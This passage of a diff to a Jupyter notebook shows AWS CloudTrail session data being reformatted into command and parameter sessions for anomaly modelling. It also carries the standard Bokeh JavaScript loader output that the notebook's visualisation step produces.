+       "      <td>aws-sdk-dotnet-45/3.3.100.7 aws-sdk-dotnet-core/3.3.100.7 .NET_Runtime/4.0 .NET_Framework/4.0 OS...</td>\n",
+       "      <td>[LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvent...</td>\n",
+       "      <td>[{'LookupEvents': {'startTime': 'May 28, 2020 3:52:26 AM', 'endTime': 'May 28, 2020 3:57:26 AM'}...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>AROA3WIKNJYL5IERDHCJX:0e1059bf-bb62-449c-bca4-90871edc48b1</td>\n",
+       "      <td>40.87.53.92</td>\n",
+       "      <td>16</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2020-05-28 04:42:30+00:00</td>\n",
+       "      <td>2020-05-28 04:42:30+00:00</td>\n",
+       "      <td>00:00:00</td>\n",
+       "      <td>Ashwin-AzSentinel</td>\n",
+       "      <td>aws-sdk-dotnet-45/3.3.100.7 aws-sdk-dotnet-core/3.3.100.7 .NET_Runtime/4.0 .NET_Framework/4.0 OS...</td>\n",
+       "      <td>[LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvent...</td>\n",
+       "      <td>[{'LookupEvents': {'startTime': 'May 28, 2020 4:22:26 AM', 'endTime': 'May 28, 2020 4:27:26 AM'}...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>AROA3WIKNJYL5IERDHCJX:0e1059bf-bb62-449c-bca4-90871edc48b1</td>\n",
+       "      <td>52.170.0.208</td>\n",
+       "      <td>16</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2020-05-28 04:02:45+00:00</td>\n",
+       "      <td>2020-05-28 04:02:45+00:00</td>\n",
+       "      <td>00:00:00</td>\n",
+       "      <td>Ashwin-AzSentinel</td>\n",
+       "      <td>aws-sdk-dotnet-45/3.3.100.7 aws-sdk-dotnet-core/3.3.100.7 .NET_Runtime/4.0 .NET_Framework/4.0 OS...</td>\n",
+       "      <td>[LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvent...</td>\n",
+       "      <td>[{'LookupEvents': {'startTime': 'May 28, 2020 3:42:26 AM', 'endTime': 'May 28, 2020 3:47:26 AM'}...</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                       UserId       ClientIP  \\\n",
+       "0  AROA3WIKNJYL5IERDHCJX:0e1059bf-bb62-449c-bca4-90871edc48b1  13.68.133.167   \n",
+       "1  AROA3WIKNJYL5IERDHCJX:0e1059bf-bb62-449c-bca4-90871edc48b1  13.68.133.167   \n",
+       "2  AROA3WIKNJYL5IERDHCJX:0e1059bf-bb62-449c-bca4-90871edc48b1    40.87.53.92   \n",
+       "3  AROA3WIKNJYL5IERDHCJX:0e1059bf-bb62-449c-bca4-90871edc48b1    40.87.53.92   \n",
+       "4  AROA3WIKNJYL5IERDHCJX:0e1059bf-bb62-449c-bca4-90871edc48b1   52.170.0.208   \n",
+       "\n",
+       "   nCmds  nDistinctCmds                     begin                       end  \\\n",
+       "0     15              1 2020-05-28 04:18:17+00:00 2020-05-28 04:18:18+00:00   \n",
+       "1     14              1 2020-05-28 04:23:23+00:00 2020-05-28 04:23:23+00:00   \n",
+       "2     14              1 2020-05-28 04:13:08+00:00 2020-05-28 04:13:09+00:00   \n",
+       "3     16              1 2020-05-28 04:42:30+00:00 2020-05-28 04:42:30+00:00   \n",
+       "4     16              1 2020-05-28 04:02:45+00:00 2020-05-28 04:02:45+00:00   \n",
+       "\n",
+       "  duration               role  \\\n",
+       "0 00:00:01  Ashwin-AzSentinel   \n",
+       "1 00:00:00  Ashwin-AzSentinel   \n",
+       "2 00:00:01  Ashwin-AzSentinel   \n",
+       "3 00:00:00  Ashwin-AzSentinel   \n",
+       "4 00:00:00  Ashwin-AzSentinel   \n",
+       "\n",
+       "                                                                                             UserAgent  \\\n",
+       "0  aws-sdk-dotnet-45/3.3.100.7 aws-sdk-dotnet-core/3.3.100.7 .NET_Runtime/4.0 .NET_Framework/4.0 OS...   \n",
+       "1  aws-sdk-dotnet-45/3.3.100.7 aws-sdk-dotnet-core/3.3.100.7 .NET_Runtime/4.0 .NET_Framework/4.0 OS...   \n",
+       "2  aws-sdk-dotnet-45/3.3.100.7 aws-sdk-dotnet-core/3.3.100.7 .NET_Runtime/4.0 .NET_Framework/4.0 OS...   \n",
+       "3  aws-sdk-dotnet-45/3.3.100.7 aws-sdk-dotnet-core/3.3.100.7 .NET_Runtime/4.0 .NET_Framework/4.0 OS...   \n",
+       "4  aws-sdk-dotnet-45/3.3.100.7 aws-sdk-dotnet-core/3.3.100.7 .NET_Runtime/4.0 .NET_Framework/4.0 OS...   \n",
+       "\n",
+       "                                                                                                  cmds  \\\n",
+       "0  [LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvent...   \n",
+       "1  [LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvent...   \n",
+       "2  [LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvent...   \n",
+       "3  [LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvent...   \n",
+       "4  [LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvent...   \n",
+       "\n",
+       "                                                                                                params  \n",
+       "0  [{'LookupEvents': {'startTime': 'May 28, 2020 3:57:26 AM', 'endTime': 'May 28, 2020 4:02:26 AM'}...  \n",
+       "1  [{'LookupEvents': {'startTime': 'May 28, 2020 4:02:26 AM', 'endTime': 'May 28, 2020 4:07:26 AM'}...  \n",
+       "2  [{'LookupEvents': {'startTime': 'May 28, 2020 3:52:26 AM', 'endTime': 'May 28, 2020 3:57:26 AM'}...  \n",
+       "3  [{'LookupEvents': {'startTime': 'May 28, 2020 4:22:26 AM', 'endTime': 'May 28, 2020 4:27:26 AM'}...  \n",
+       "4  [{'LookupEvents': {'startTime': 'May 28, 2020 3:42:26 AM', 'endTime': 'May 28, 2020 3:47:26 AM'}...  "
+      ]
+     },
+     "execution_count": 39,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "aws_df.head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Convert AWS sessions to the correct format for the model <a id='clean_aws'></a>\n",
+    "\n",
+    "Recall the allowed session types [here](#create_sessions)\n",
+    "\n",
+    "<b>So let's see what needs to be done to the aws_df</b>\n",
+    "\n",
+    "The \"cmds\" column is already in a suitable format of type (1). This is because it is a list of strings.\n",
+    "If we wish to also include the parameters (and optionally the corresponding values) to the model, then we need to transform the \"params\" column slightly"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 40,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# define a helper function for converting the sessions with params (and values) into a suitable format\n",
+    "\n",
+    "def process_aws_session(session_with_params: List[Dict[str, Dict[str, any]]], include_vals: bool) -> List[Cmd]:\n",
+    "    \"\"\"\n",
+    "    Converts an aws session with params to an allowed format.\n",
+    "    \n",
+    "    param session_with_params: example format:\n",
+    "        [\n",
+    "            {'GetAuthorizationToken': {'registryIds': ['424246']}},\n",
+    "            {'GetAuthorizationToken': {'registryIds': ['424246', '654321']}}\n",
+    "        ]\n",
+    "        Note that the accompanying values for the parameters can take dynamic types like dict, list etc.\n",
+    "        However, when we transform the aws session into an allowed format, the value will be cast into a string type.\n",
+    "        \n",
+    "    param include_vals: if True, then it will be transformed to a format which includes the values, \n",
+    "        else the output will just contain the parameters\n",
+    "    \n",
+    "    return: list of the Cmd data type which includes either just the parameters, or also the corresponding values    \n",
+    "    \"\"\"\n",
+    "    new_ses = []\n",
+    "    for cmd in session_with_params:\n",
+    "        c = list(cmd.keys())[0]\n",
+    "        par = list(cmd.values())[0]\n",
+    "        new_pars = set()\n",
+    "        if include_vals:\n",
+    "            new_pars = dict()\n",
+    "        for p, v in par.items():\n",
+    "            if include_vals:\n",
+    "                new_pars[p] = str(v)\n",
+    "            else:\n",
+    "                new_pars.add(p)\n",
+    "        new_ses.append(Cmd(name=c, params=new_pars))\n",
+    "    return new_ses\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 41,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# let's create suitable sessions for params, and suitable sessions for params + values\n",
+    "sessions = aws_df.cmds.values.tolist()\n",
+    "param_sessions = []\n",
+    "param_value_sessions = []\n",
+    "\n",
+    "for ses in aws_df.params.values.tolist():\n",
+    "    new_ses_set = process_aws_session(session_with_params=ses, include_vals=False)\n",
+    "    new_ses_dict = process_aws_session(session_with_params=ses, include_vals=True)\n",
+    "    param_sessions.append(new_ses_set)\n",
+    "    param_value_sessions.append(new_ses_dict)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 42,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "['LookupEvents', 'LookupEvents', 'LookupEvents']\n",
+      "[Cmd(name='LookupEvents', params={'startTime', 'endTime'}), Cmd(name='LookupEvents', params={'startTime', 'endTime'}), Cmd(name='LookupEvents', params={'startTime', 'endTime'})]\n",
+      "[Cmd(name='LookupEvents', params={'startTime': 'May 28, 2020 3:57:26 AM', 'endTime': 'May 28, 2020 4:02:26 AM'}), Cmd(name='LookupEvents', params={'startTime': 'May 28, 2020 3:57:26 AM', 'endTime': 'May 28, 2020 4:02:26 AM'}), Cmd(name='LookupEvents', params={'startTime': 'May 28, 2020 3:57:26 AM', 'endTime': 'May 28, 2020 4:02:26 AM'})]\n"
+     ]
+    }
+   ],
+   "source": [
+    "# let's see the differences between the three types of sessions\n",
+    "ind = 0\n",
+    "\n",
+    "print(sessions[ind][:3])\n",
+    "\n",
+    "print(param_sessions[ind][:3])\n",
+    "\n",
+    "print(param_value_sessions[ind][:3])"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 43,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# let's add these reformatted sessions as columns to a dataframe\n",
+    "data = aws_df\n",
+    "data['session'] = sessions\n",
+    "data['param_session'] = param_sessions\n",
+    "data['param_value_session'] = param_value_sessions"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Now we will model and visualise these sessions in one go.\n",
+    "\n",
+    "We do this using the <b>score_and_visualise_sessions</b> function.\n",
+    "\n",
+    "As before, since we created columns for all 3 session types, the session_column argument can be set to any of the following:\n",
+    "\n",
+    "- session\n",
+    "- param_session\n",
+    "- param_value_session"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 44,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1976\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "\n",
+       "(function(root) {\n",
+       "  function now() {\n",
+       "    return new Date();\n",
+       "  }\n",
+       "\n",
+       "  var force = true;\n",
+       "\n",
+       "  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n",
+       "    root._bokeh_onload_callbacks = [];\n",
+       "    root._bokeh_is_loading = undefined;\n",
+       "  }\n",
+       "\n",
+       "  var JS_MIME_TYPE = 'application/javascript';\n",
+       "  var HTML_MIME_TYPE = 'text/html';\n",
+       "  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n",
+       "  var CLASS_NAME = 'output_bokeh rendered_html';\n",
+       "\n",
+       "  /**\n",
+       "   * Render data to the DOM node\n",
+       "   */\n",
+       "  function render(props, node) {\n",
+       "    var script = document.createElement(\"script\");\n",
+       "    node.appendChild(script);\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when an output is cleared or removed\n",
+       "   */\n",
+       "  function handleClearOutput(event, handle) {\n",
+       "    var cell = handle.cell;\n",
+       "\n",
+       "    var id = cell.output_area._bokeh_element_id;\n",
+       "    var server_id = cell.output_area._bokeh_server_id;\n",
+       "    // Clean up Bokeh references\n",
+       "    if (id != null && id in Bokeh.index) {\n",
+       "      Bokeh.index[id].model.document.clear();\n",
+       "      delete Bokeh.index[id];\n",
+       "    }\n",
+       "\n",
+       "    if (server_id !== undefined) {\n",
+       "      // Clean up Bokeh references\n",
+       "      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n",
+       "      cell.notebook.kernel.execute(cmd, {\n",
+       "        iopub: {\n",
+       "          output: function(msg) {\n",
+       "            var id = msg.content.text.trim();\n",
+       "            if (id in Bokeh.index) {\n",
+       "              Bokeh.index[id].model.document.clear();\n",
+       "              delete Bokeh.index[id];\n",
+       "            }\n",
+       "          }\n",
+       "        }\n",
+       "      });\n",
+       "      // Destroy server and session\n",
+       "      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n",
+       "      cell.notebook.kernel.execute(cmd);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when a new output is added\n",
+       "   */\n",
+       "  function handleAddOutput(event, handle) {\n",
+       "    var output_area = handle.output_area;\n",
+       "    var output = handle.output;\n",
+       "\n",
+       "    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n",
+       "    if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n",
+       "      return\n",
+       "    }\n",
+       "\n",
+       "    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n",
+       "\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n",
+       "      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n",
+       "      // store reference to embed id on output_area\n",
+       "      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n",
+       "    }\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n",
+       "      var bk_div = document.createElement(\"div\");\n",
+       "      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n",
+       "      var script_attrs = bk_div.children[0].attributes;\n",
+       "      for (var i = 0; i < script_attrs.length; i++) {\n",
+       "        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n",
+       "        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n",
+       "      }\n",
+       "      // store reference to server id on output_area\n",
+       "      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  function register_renderer(events, OutputArea) {\n",
+       "\n",
+       "    function append_mime(data, metadata, element) {\n",
+       "      // create a DOM node to render to\n",
+       "      var toinsert = this.create_output_subarea(\n",
+       "        metadata,\n",
+       "        CLASS_NAME,\n",
+       "        EXEC_MIME_TYPE\n",
+       "      );\n",
+       "      this.keyboard_manager.register_events(toinsert);\n",
+       "      // Render to node\n",
+       "      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n",
+       "      render(props, toinsert[toinsert.length - 1]);\n",
+       "      element.append(toinsert);\n",
+       "      return toinsert\n",
+       "    }\n",
+       "\n",
+       "    /* Handle when an output is cleared or removed */\n",
+       "    events.on('clear_output.CodeCell', handleClearOutput);\n",
+       "    events.on('delete.Cell', handleClearOutput);\n",
+       "\n",
+       "    /* Handle when a new output is added */\n",
+       "    events.on('output_added.OutputArea', handleAddOutput);\n",
+       "\n",
+       "    /**\n",
+       "     * Register the mime type and append_mime function with output_area\n",
+       "     */\n",
+       "    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n",
+       "      /* Is output safe? */\n",
+       "      safe: true,\n",
+       "      /* Index of renderer in `output_area.display_order` */\n",
+       "      index: 0\n",
+       "    });\n",
+       "  }\n",
+       "\n",
+       "  // register the mime type if in Jupyter Notebook environment and previously unregistered\n",
+       "  if (root.Jupyter !== undefined) {\n",
+       "    var events = require('base/js/events');\n",
+       "    var OutputArea = require('notebook/js/outputarea').OutputArea;\n",
+       "\n",
+       "    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n",
+       "      register_renderer(events, OutputArea);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n",
+       "    root._bokeh_timeout = Date.now() + 5000;\n",
+       "    root._bokeh_failed_load = false;\n",
+       "  }\n",
+       "\n",
+       "  var NB_LOAD_WARNING = {'data': {'text/html':\n",
+       "     \"<div style='background-color: #fdd'>\\n\"+\n",
+       "     \"<p>\\n\"+\n",
+       "     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n",
+       "     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n",
+       "     \"</p>\\n\"+\n",
+       "     \"<ul>\\n\"+\n",
+       "     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n",
+       "     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n",
+       "     \"</ul>\\n\"+\n",
+       "     \"<code>\\n\"+\n",
+       "     \"from bokeh.resources import INLINE\\n\"+\n",
+       "     \"output_notebook(resources=INLINE)\\n\"+\n",
+       "     \"</code>\\n\"+\n",
+       "     \"</div>\"}};\n",
+       "\n",
+       "  function display_loaded() {\n",
+       "    var el = document.getElementById(\"1976\");\n",
+       "    if (el != null) {\n",
+       "      el.textContent = \"BokehJS is loading...\";\n",
+       "    }\n",
+       "    if (root.Bokeh !== undefined) {\n",
+       "      if (el != null) {\n",
+       "        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n",
+       "      }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(display_loaded, 100)\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "\n",
+       "  function run_callbacks() {\n",
+       "    try {\n",
+       "      root._bokeh_onload_callbacks.forEach(function(callback) {\n",
+       "        if (callback != null)\n",
+       "          callback();\n",
+       "      });\n",
+       "    } finally {\n",
+       "      delete root._bokeh_onload_callbacks\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: all callbacks have finished\");\n",
+       "  }\n",
+       "\n",
+       "  function load_libs(css_urls, js_urls, callback) {\n",
+       "    if (css_urls == null) css_urls = [];\n",
+       "    if (js_urls == null) js_urls = [];\n",
+       "\n",
+       "    root._bokeh_onload_callbacks.push(callback);\n",
+       "    if (root._bokeh_is_loading > 0) {\n",
+       "      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n",
+       "      return null;\n",
+       "    }\n",
+       "    if (js_urls == null || js_urls.length === 0) {\n",
+       "      run_callbacks();\n",
+       "      return null;\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n",
+       "    root._bokeh_is_loading = css_urls.length + js_urls.length;\n",
+       "\n",
+       "    function on_load() {\n",
+       "      root._bokeh_is_loading--;\n",
+       "      if (root._bokeh_is_loading === 0) {\n",
+       "        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n",
+       "        run_callbacks()\n",
+       "      }\n",
+       "    }\n",
+       "\n",
+       "    function on_error() {\n",
+       "      console.error(\"failed to load \" + url);\n",
+       "    }\n",
+       "\n",
+       "    for (var i = 0; i < css_urls.length; i++) {\n",
+       "      var url = css_urls[i];\n",
+       "      const element = document.createElement(\"link\");\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.rel = \"stylesheet\";\n",
+       "      element.type = \"text/css\";\n",
+       "      element.href = url;\n",
+       "      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n",
+       "      document.body.appendChild(element);\n",
+       "    }\n",
+       "\n",
+       "    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.2.min.js\": \"ufR9RFnRs6lniiaFvtJziE0YeidtAgBRH6ux2oUItHw5WTvE1zuk9uzhUU/FJXDp\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.2.min.js\": \"8QM/PGWBT+IssZuRcDcjzwIh1mkOmJSoNMmyYDZbCfXJg3Ap1lEvdVgFuSAwhb/J\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.2.min.js\": \"Jm8cH3Rg0P6UeZhVY5cLy1WzKajUT9KImCY+76hEqrcJt59/d8GPvFHjCkYgnSIn\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.2.min.js\": \"Ozhzj+SI7ywm74aOI/UajcWz+C0NjsPunEVyVIrxzYkB+jA+2tUw8x5xJCbVtK5I\"};\n",
+       "\n",
+       "    for (var i = 0; i < js_urls.length; i++) {\n",
+       "      var url = js_urls[i];\n",
+       "      var element = document.createElement('script');\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.async = false;\n",
+       "      element.src = url;\n",
+       "      if (url in hashes) {\n",
+       "        element.crossOrigin = \"anonymous\";\n",
+       "        element.integrity = \"sha384-\" + hashes[url];\n",
+       "      }\n",
+       "      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n",
+       "      document.head.appendChild(element);\n",
+       "    }\n",
+       "  };\n",
+       "\n",
+       "  function inject_raw_css(css) {\n",
+       "    const element = document.createElement(\"style\");\n",
+       "    element.appendChild(document.createTextNode(css));\n",
+       "    document.body.appendChild(element);\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.2.min.js\"];\n",
+       "  var css_urls = [];\n",
+       "  \n",
+       "\n",
+       "  var inline_js = [\n",
+       "    function(Bokeh) {\n",
+       "      Bokeh.set_log_level(\"info\");\n",
+       "    },\n",
+       "    function(Bokeh) {\n",
+       "    \n",
+       "    \n",
+       "    }\n",
+       "  ];\n",
+       "\n",
+       "  function run_inline_js() {\n",
+       "    \n",
+       "    if (root.Bokeh !== undefined || force === true) {\n",
+       "      \n",
+       "    for (var i = 0; i < inline_js.length; i++) {\n",
+       "      inline_js[i].call(root, root.Bokeh);\n",
+       "    }\n",
+       "    if (force === true) {\n",
+       "        display_loaded();\n",
+       "      }} else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(run_inline_js, 100);\n",
+       "    } else if (!root._bokeh_failed_load) {\n",
+       "      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n",
+       "      root._bokeh_failed_load = true;\n",
+       "    } else if (force !== true) {\n",
+       "      var cell = $(document.getElementById(\"1976\")).parents('.cell').data().cell;\n",
+       "      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n",
+       "    }\n",
+       "\n",
+       "  }\n",
+       "\n",
+       "  if (root._bokeh_is_loading === 0) {\n",
+       "    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n",
+       "    run_inline_js();\n",
+       "  } else {\n",
+       "    load_libs(css_urls, js_urls, function() {\n",
+       "      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n",
+       "      run_inline_js();\n",
+       "    });\n",
+       "  }\n",
+       "}(window));"
+      ],
+      "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  \n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1976\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.2.min.js\": \"ufR9RFnRs6lniiaFvtJziE0YeidtAgBRH6ux2oUItHw5WTvE1zuk9uzhUU/FJXDp\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.2.min.js\": \"8QM/PGWBT+IssZuRcDcjzwIh1mkOmJSoNMmyYDZbCfXJg3Ap1lEvdVgFuSAwhb/J\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.2.min.js\": \"Jm8cH3Rg0P6UeZhVY5cLy1WzKajUT9KImCY+76hEqrcJt59/d8GPvFHjCkYgnSIn\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.2.min.js\": \"Ozhzj+SI7ywm74aOI/UajcWz+C0NjsPunEVyVIrxzYkB+jA+2tUw8x5xJCbVtK5I\"};\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1976\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));"
+     },
